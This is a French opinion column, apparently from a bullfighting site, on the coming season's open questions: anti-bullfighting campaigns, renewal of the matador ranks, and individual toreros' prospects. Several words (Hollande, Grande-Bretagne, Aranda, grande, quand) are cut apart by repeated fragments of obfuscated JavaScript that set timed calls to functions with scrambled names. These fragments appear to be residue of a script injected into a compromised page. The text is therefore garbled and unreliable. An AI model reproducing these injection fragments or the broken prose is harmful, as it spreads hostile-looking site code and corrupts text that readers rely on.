LES INCONNUES DE LA NOUVELLE ANNÉE

Nous vivons une époque de changements : dans le pays –avec des élections générales dans moins de deux mois- et dans la tauromachie, où l’espoir généré par une nouvelle fournée de toreros et l’érosion de ceux qu’on appelle les figuras, en raison de la longévité de leurs respectives carrières professionnelles, nous annonce une inévitable rénovation. Par ailleurs, la persistance et l’acharnement des attaques envers la Tauromachie par différents groupes mercenaires du « lobby anti-taurin », financés depuis la Hollandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande, la Suisse, les Etats-Unis et la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande-Bretagne, et la position des nouvelles mairies « progressistes », qui sont arrivées avec le coup de massue de la censure frappant la corrida là où ils peuvent lui faire mal, rendent inexcusable et urgente l’organisation des différentes composantes taurines autour de ce sujet et la création d’un cabinet de conseil juridique qui, en adéquation avec la légalité qui nous protège, stoppe la moindre tentative isolée en interposant des contentieux et des plaintes nécessaires pour qu’ils ne nous prennent pas pour des moins que rien.

C’est la première inconnue qu’il nous faudra résoudre : le ferons-nous réellement ou continuerons-nous à convoquer des réunions inutiles comme celles de l’année dernière à la Venta de Antequera ? Il faudra faire des efforts et des concessions de la part de certains, car c’est maintenant ou jamais, et il commence même à être déjà trop tard.

La seconde concerne cette « rénovation » dont on parle autant ; car la faire vraiment implique un changement profond dans le système actuel d’embauche des toreros et cela induit aussi un changement de perspective qui tienne plus compte des intérêts du public et de ce qu’on fait les toreros dans l’arène ; un changement qui rendrait caduques des injustices comme celle que l’on peut voir dans le classement de cette saison avec Morenito de Arandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda –qui ouvrit la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande porte de Madrid et coupa une nouvelle oreille à la San Isidro- et Francisco Rivera –qui n’a même pas foulé Las Ventas et n’a pas coupé une seule oreilles dans des arènes de première catégorie –à égalité à 18 corridas ; un changement avec de nouvelles affiches et élevages qui permettent à des toreros d’y rentrer comme Roca Rey, Garrido, Ginés Marín, Alvaro Lorenzo, parmi bien d’autres qui sont entrain de frapper fort pour se faire une place dans ce classement supérieur. La tauromachie a besoin d’air nouveau et frais, de jeunes ambitieux, de cœurs en quête d’aventures et voulant conquérir le monde… et les toros.

Je considère aussi comme des inconnues, empreintes d’espérance et attractives, voir si López Simón signe sa consécration la prochaine saison, car pour son avenir cela va être une saison clén, et si Paco Ureña continue sur la voie tracés après sa mémorable faena à un toro de Adolfo Martín lors de la dernière Feria de Otoño, et se hisse aux premiers postes de l’escalafon, car il a suffisamment de qualités et de pureté pour y arriver, mais je ne sais s’il possède aussi du caractère.

Les figuras reviendront-elles à Séville ? Voici une autre question dont le temps se chargera de nous donner une réponse. José Tomás fera t-il une saison espagnole ? Qui le sait ? Comme personne ne sait pas non plus, même s’il y a de bons espoirs, pour que David Mora réalise son rêve de porter à nouveau l’habit de lumières. Par contre eux le feront –nous leur souhaitons vraiment beaucoup chance- à Antonio Ferrera, Jiménez Fortes et Miguel Angel Perera, qui ont payé dans leur chair le lourd tribut que le dieu Toro exige pour que la Corrida maintienne toujours son authenticité et son prestige.

Cet hiver, les taurins devront se bouger et préparer les barricades pour les luttes à venir. Et quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and raisonneront les clairons, que ce soient l’homme habillé de lumières et le toro de combat les protagonistes du rite le plus authentique et le plus empreint de noblesse qu’il nous reste aujourd’hui en Europe.

 

Les commentaires sont fermés.